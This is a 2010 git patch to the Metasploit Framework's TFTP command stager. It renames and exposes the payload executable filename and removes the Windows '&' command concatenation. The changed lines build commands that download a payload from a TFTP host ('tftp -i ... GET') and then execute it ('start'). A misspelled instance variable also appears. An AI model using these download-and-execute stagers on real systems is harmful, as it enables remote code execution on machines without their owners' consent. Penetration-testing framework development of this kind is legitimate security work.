From 8dd489ad3b7b801a2da5ed400724e0f51668fba7 Mon Sep 17 00:00:00 2001
From: Joshua Drake <github.jdrake@qoop.org>
Date: Fri, 27 Aug 2010 17:23:47 +0000
Subject: [PATCH] expose the payload exe filename, remove the concat operator

git-svn-id: file:///home/svn/framework3/trunk@10169 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/msf/core/exploit/cmdstager.rb      |  5 +++--
 lib/msf/core/exploit/cmdstager_tftp.rb |  5 +++++
 lib/rex/exploitation/cmdstager/tftp.rb | 14 +++++++-------
 3 files changed, 15 insertions(+), 9 deletions(-)

diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index d2b4d4a7e0..fe346b93ed 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -22,6 +22,7 @@ module Exploit::CmdStager
 	def initialize(info = {})
 		super
 		@cmd_list = nil
+		@stager_innstace = nil
 	end
 
 
@@ -64,8 +65,8 @@ module Exploit::CmdStager
 
 		@exe = generate_exe
 
-		stager_instance = create_stager(@exe)
-		cmd_list = stager_instance.generate(opts)
+		@stager_instance = create_stager(@exe)
+		cmd_list = @stager_instance.generate(opts)
 
 		if (cmd_list.nil? or cmd_list.length < 1)
 			print_error("The command stager could not be generated")
diff --git a/lib/msf/core/exploit/cmdstager_tftp.rb b/lib/msf/core/exploit/cmdstager_tftp.rb
index 90ea8acd08..083f80b92e 100644
--- a/lib/msf/core/exploit/cmdstager_tftp.rb
+++ b/lib/msf/core/exploit/cmdstager_tftp.rb
@@ -58,6 +58,11 @@ module Exploit::CmdStagerTFTP
 	def execute_cmdstager_end(opts)
 		stop_service
 	end
+	
+	def payload_exe
+		return nil if not @stager_instance
+		@stager_instance.payload_exe
+	end
 
 end
 
diff --git a/lib/rex/exploitation/cmdstager/tftp.rb b/lib/rex/exploitation/cmdstager/tftp.rb
index f15aaab7d4..d389d95e61 100644
--- a/lib/rex/exploitation/cmdstager/tftp.rb
+++ b/lib/rex/exploitation/cmdstager/tftp.rb
@@ -30,7 +30,7 @@ class CmdStagerTFTP < CmdStagerBase
 	def initialize(exe)
 		super
 
-		@var_payload_out = Rex::Text.rand_text_alpha(8) + ".exe"
+		@payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
 	end
 
 
@@ -40,10 +40,10 @@ class CmdStagerTFTP < CmdStagerBase
 	#
 	def compress_commands(cmds, opts)
 		# Initiate the download
-		cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @var_payload_out}"
+		cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"
 
 		# Make it all happen
-		cmds << "start #{@tempdir + @var_payload_out}"
+		cmds << "start #{@tempdir + @payload_exe}"
 
 		# Clean up after unless requested not to..
 		if (not opts[:nodelete])
@@ -53,11 +53,11 @@ class CmdStagerTFTP < CmdStagerBase
 		super
 	end
 
-	# Windows uses & to concat strings
-	def cmd_concat_operator
-		" & "
-	end
+	# NOTE: We don't use a concatenation operator here since we only have a couple commands.
+	# There really isn't any need to combine them. Also, the ms01_026 exploit depends on
+	# the start command being issued separately so that it can ignore it :)
 
+	attr_reader :payload_exe
 end
 end
 end